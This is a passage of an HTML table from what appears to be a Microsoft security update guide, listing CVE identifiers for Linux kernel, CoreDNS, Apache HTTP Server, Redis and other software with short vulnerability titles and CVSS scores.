href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43022">CVE-2026-43022</a></td><td><p>Bluetooth: hci_sync: hci_cmd_sync_queue_once() return -EEXIST if exists</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43042">CVE-2026-43042</a></td><td><p>mpls: add seqcount to protect the platform_label{,s} pair</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31771">CVE-2026-31771</a></td><td><p>Bluetooth: hci_event: move wake reason storage into validated event handlers</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>8.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43052">CVE-2026-43052</a></td><td><p>wifi: mac80211: check tdls flag in ieee80211_tdls_oper</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31709">CVE-2026-31709</a></td><td><p>smb: client: validate the whole DACL before rewriting it in cifsacl</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43021">CVE-2026-43021</a></td><td><p>Bluetooth: hci_sync: fix leaks when hci_cmd_sync_queue_once fails</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31712">CVE-2026-31712</a></td><td><p>ksmbd: require minimum ACE size in smb_check_perm_dacl()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>8.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43010">CVE-2026-43010</a></td><td><p>bpf: Reject sleepable kprobe_multi programs at attach time</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43019">CVE-2026-43019</a></td><td><p>Bluetooth: hci_conn: fix potential UAF in set_cig_params_sync</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31729">CVE-2026-31729</a></td><td><p>usb: typec: ucsi: validate connector number in ucsi_notify_common()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43045">CVE-2026-43045</a></td><td><p>mshv: Fix error handling in mshv_region_pin</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43009">CVE-2026-43009</a></td><td><p>bpf: Fix incorrect pruning due to atomic fetch precision tracking</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31715">CVE-2026-31715</a></td><td><p>f2fs: fix UAF caused by decrementing sbi-&gt;nr_pages[] in f2fs_write_end_io()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31697">CVE-2026-31697</a></td><td><p>crypto: ccp: Don't attempt to copy ID to userspace if PSP command failed</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31721">CVE-2026-31721</a></td><td><p>usb: gadget: f_hid: move list and spinlock inits from bind to alloc</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31711">CVE-2026-31711</a></td><td><p>smb: server: fix active_num_conn leak on transport allocation failure</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31699">CVE-2026-31699</a></td><td><p>crypto: ccp: Don't attempt to copy CSR to userspace if PSP command failed</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31694">CVE-2026-31694</a></td><td><p>fuse: reject oversized dirents in page cache</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31705">CVE-2026-31705</a></td><td><p>ksmbd: fix out-of-bounds write in smb2_get_ea() EA alignment</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>9.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43033">CVE-2026-43033</a></td><td><p>crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31696">CVE-2026-31696</a></td><td><p>rxrpc: Fix missing validation of ticket length in non-XDR key preparsing</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31698">CVE-2026-31698</a></td><td><p>crypto: ccp: Don't attempt to copy PDH cert to userspace if PSP command failed</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31704">CVE-2026-31704</a></td><td><p>ksmbd: use check_add_overflow() to prevent u16 DACL size overflow</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31702">CVE-2026-31702</a></td><td><p>f2fs: fix use-after-free of sbi in f2fs_compress_write_end_io()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31708">CVE-2026-31708</a></td><td><p>smb: client: fix OOB read in smb2_ioctl_query_info QUERY_INFO path</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>8.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31700">CVE-2026-31700</a></td><td><p>net/packet: fix TOCTOU race on mmap'd vnet_hdr in tpacket_snd()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7598">CVE-2026-7598</a></td><td><p>libssh2 userauth.c userauth_password integer overflow</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43058">CVE-2026-43058</a></td><td><p>media: vidtv: fix pass-by-value structs causing MSAN warnings</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-37457">CVE-2026-37457</a></td><td><p></p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43964">CVE-2026-43964</a></td><td><p></p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>3.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43037">CVE-2026-43037</a></td><td><p>ip6_tunnel: clear skb2-&gt;cb[] in ip4ip6_err()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33190">CVE-2026-33190</a></td><td><p>CoreDNS TSIG authentication bypass on encrypted DNS transports</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33489">CVE-2026-33489</a></td><td><p>CoreDNS transfer plugin subzone ACL bypass via lexicographic zone comparison</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-32936">CVE-2026-32936</a></td><td><p>CoreDNS DoH GET path missing size validation causes CPU and memory amplification</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-32934">CVE-2026-32934</a></td><td><p>CoreDNS DNS-over-QUIC unbounded goroutine growth leads to denial of service</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35579">CVE-2026-35579</a></td><td><p>CoreDNS TSIG authentication bypass on gRPC, QUIC, DoH, and DoH3 transports</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43073">CVE-2026-43073</a></td><td><p>x86-64: rename misleadingly named '__copy_user_nocache()' function</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>2.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42151">CVE-2026-42151</a></td><td><p>Prometheus Azure AD remote write OAuth client secret exposed via config API</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42154">CVE-2026-42154</a></td><td><p>Prometheus: remote read endpoint allows denial of service via crafted snappy payload</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43125">CVE-2026-43125</a></td><td><p>dlm: validate length in dlm_search_rsb_tree</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43248">CVE-2026-43248</a></td><td><p>vhost: move vdpa group bound check to vhost_vdpa</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43176">CVE-2026-43176</a></td><td><p>wifi: rtw89: pci: validate release report content before using for RTL8922DE</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43204">CVE-2026-43204</a></td><td><p>ASoC: qcom: q6asm: drop DSP responses for closed data streams</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43131">CVE-2026-43131</a></td><td><p>drm/amd/pm: Fix null pointer dereference issue</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43126">CVE-2026-43126</a></td><td><p>ALSA: mixer: oss: Add card disconnect checkpoints</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43127">CVE-2026-43127</a></td><td><p>ntfs3: fix circular locking dependency in run_unpack_ex</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43161">CVE-2026-43161</a></td><td><p>iommu/vt-d: Skip dev-iotlb flush for inaccessible PCIe device without scalable mode</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43198">CVE-2026-43198</a></td><td><p>tcp: fix potential race in tcp_v6_syn_recv_sock()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>4.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43245">CVE-2026-43245</a></td><td><p>ntfs: -&gt;d_compare() must not block</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-71290">CVE-2025-71290</a></td><td><p>misc: ti_fpc202: fix a potential memory leak in probe function</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43137">CVE-2026-43137</a></td><td><p>ASoC: SOF: Intel: hda: Fix NULL pointer dereference</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43115">CVE-2026-43115</a></td><td><p>srcu: Use irq_work to start GP in tiny SRCU</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43234">CVE-2026-43234</a></td><td><p>team: avoid NETDEV_CHANGEMTU event when unregistering slave</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-71293">CVE-2025-71293</a></td><td><p>drm/amdgpu/ras: Move ras data alloc before bad page check</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43172">CVE-2026-43172</a></td><td><p>wifi: iwlwifi: fix 22000 series SMEM parsing</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-71285">CVE-2025-71285</a></td><td><p>net: qrtr: Drop the MHI auto_queue feature for IPCR DL channels</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>4.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43197">CVE-2026-43197</a></td><td><p>netconsole: avoid OOB reads, msg is not nul-terminated</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43185">CVE-2026-43185</a></td><td><p>ksmbd: fix signededness bug in smb_direct_prepare_negotiation()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-71273">CVE-2025-71273</a></td><td><p>wifi: rtw88: Use devm_kmemdup() in rtw_set_supported_band()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43118">CVE-2026-43118</a></td><td><p>btrfs: fix zero size inode with non-zero size after log replay</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>3.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43109">CVE-2026-43109</a></td><td><p>x86: shadow stacks: proper error handling for mmap lock</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43153">CVE-2026-43153</a></td><td><p>xfs: remove xfs_attr_leaf_hasname</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43129">CVE-2026-43129</a></td><td><p>ima: verify the previous kernel's IMA buffer lies in addressable RAM</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43116">CVE-2026-43116</a></td><td><p>netfilter: ctnetlink: ensure safe access to master conntrack</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43274">CVE-2026-43274</a></td><td><p>mailbox: mchp-ipc-sbi: fix out-of-bounds access in mchp_ipc_get_cluster_aggr_irq()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43244">CVE-2026-43244</a></td><td><p>kcm: fix zero-frag skb in frag_list on partial sendmsg error</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43191">CVE-2026-43191</a></td><td><p>drm/amd/display: Adjust PHY FSM transition to TX_EN-to-PLL_ON for TMDS on DCN35</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43258">CVE-2026-43258</a></td><td><p>alpha: fix user-space corruption during memory compaction</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-71289">CVE-2025-71289</a></td><td><p>fs/ntfs3: handle attr_set_size() errors when truncating files</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43107">CVE-2026-43107</a></td><td><p>xfrm: account XFRMA_IF_ID in aevent size calculation</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43243">CVE-2026-43243</a></td><td><p>drm/amd/display: Add signal type check for dcn401 get_phyd32clk_src</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-71294">CVE-2025-71294</a></td><td><p>drm/amdgpu: fix NULL pointer issue buffer funcs</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43250">CVE-2026-43250</a></td><td><p>usb: chipidea: udc: fix DMA and SG cleanup in _ep_nuke()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43237">CVE-2026-43237</a></td><td><p>drm/amdgpu: Refactor amdgpu_gem_va_ioctl for Handling Last Fence Update and Timeline Management v4</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43201">CVE-2026-43201</a></td><td><p>APEI/GHES: ARM processor Error: don't go past allocated memory</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43219">CVE-2026-43219</a></td><td><p>net: cpsw_new: Fix potential unregister of netdev that has not been registered yet</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43165">CVE-2026-43165</a></td><td><p>hwmon: (nct7363) Fix a resource leak in nct7363_present_pwm_fanin</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43088">CVE-2026-43088</a></td><td><p>net: af_key: zero aligned sockaddr tail in PF_KEY exports</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43195">CVE-2026-43195</a></td><td><p>drm/amdgpu: validate user queue size constraints</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-71272">CVE-2025-71272</a></td><td><p>most: core: fix resource leak in most_register_interface error paths</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43213">CVE-2026-43213</a></td><td><p>wifi: rtw89: pci: validate sequence number of TX release report</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43228">CVE-2026-43228</a></td><td><p>hfs: Replace BUG_ON with error handling for CNID count checks</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43216">CVE-2026-43216</a></td><td><p>net: Drop the lock in skb_may_tx_timestamp()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43119">CVE-2026-43119</a></td><td><p>Bluetooth: hci_sync: annotate data-races around hdev-&gt;req_status</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43267">CVE-2026-43267</a></td><td><p>wifi: rtw89: fix potential zero beacon interval in beacon tracking</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43101">CVE-2026-43101</a></td><td><p>ipv6: ioam: fix potential NULL dereferences in __ioam6_fill_trace_data()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43199">CVE-2026-43199</a></td><td><p>net/mlx5e: Fix "scheduling while atomic" in IPsec MAC address query</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43083">CVE-2026-43083</a></td><td><p>net: ioam6: fix OOB and missing lock</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43870">CVE-2026-43870</a></td><td><p>Apache Thrift: Node.js web_server.js multi-vulnerability</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43868">CVE-2026-43868</a></td><td><p>Apache Thrift: Rust implementation vulnerable to CVE-2020-13949 pattern</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33523">CVE-2026-33523</a></td><td><p>Apache HTTP Server: multiple modules: HTTP response splitting forwarding malicious status line</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-23918">CVE-2026-23918</a></td><td><p>Apache HTTP Server: http2: double free and possible RCE on early reset</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34059">CVE-2026-34059</a></td><td><p>Apache HTTP Server: mod_proxy_ajp: Heap Over-Read and memory disclosure in ajp_parse_data()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34032">CVE-2026-34032</a></td><td><p>Apache HTTP Server: mod_proxy_ajp: Heap Buffer Over-Read Due to Missing Null-Termination Check (ajp_msg_get_string)</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24072">CVE-2026-24072</a></td><td><p>Apache HTTP Server: mod_rewrite elevation of privileges via ap_expr</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33006">CVE-2026-33006</a></td><td><p>Apache HTTP Server: mod_auth_digest timing attack</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>4.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33007">CVE-2026-33007</a></td><td><p>Apache HTTP Server: mod_authn_socache crash</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-29169">CVE-2026-29169</a></td><td><p>Apache HTTP Server: mod_dav_lock indirect lock crash</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-29168">CVE-2026-29168</a></td><td><p>Apache HTTP Server: mod_md unrestricted OCSP response</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33857">CVE-2026-33857</a></td><td><p>Apache HTTP Server: Off-by-one OOB reads in AJP getter functions</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41672">CVE-2026-41672</a></td><td><p>xmldom: XML node injection through unvalidated comment serialization</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41674">CVE-2026-41674</a></td><td><p>xmldom: XML injection through unvalidated DocumentType serialization</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41675">CVE-2026-41675</a></td><td><p>xmldom: XML node injection through unvalidated processing instruction serialization</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41673">CVE-2026-41673</a></td><td><p>xmldom: Denial of service via uncontrolled recursion in XML serialization</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25243">CVE-2026-25243</a></td><td><p>redis-server RESTORE invalid memory access may allow remote code execution</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-23631">CVE-2026-23631</a></td><td><p>redis-server Lua use-after-free may allow remote code execution</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31717">CVE-2026-31717</a></td><td><p>ksmbd: validate owner of durable handle on reconnect</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31718">CVE-2026-31718</a></td><td><p>ksmbd: fix use-after-free in __ksmbd_close_fd() via durable scavenger</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>9.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-23479">CVE-2026-23479</a></td><td><p>redis-server use-after-free in unblock client flow may allow remote code execution</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25588">CVE-2026-25588</a></td><td><p>RedisTimeSeries RESTORE invalid memory access may allow remote code execution</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25589">CVE-2026-25589</a></td><td><p>RedisBloom RESTORE invalid memory access may allow remote code execution</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43474">CVE-2026-43474</a></td><td><p>fs: init flags_valid before calling vfs_fileattr_get</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43338">CVE-2026-43338</a></td><td><p>btrfs: reserve enough transaction items for qgroup ioctls</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-71302">CVE-2025-71302</a></td><td><p>drm/panthor: fix for dma-fence safe access rules</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43318">CVE-2026-43318</a></td><td><p>drm/amdgpu: fix sync handling in amdgpu_dma_buf_move_notify</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a 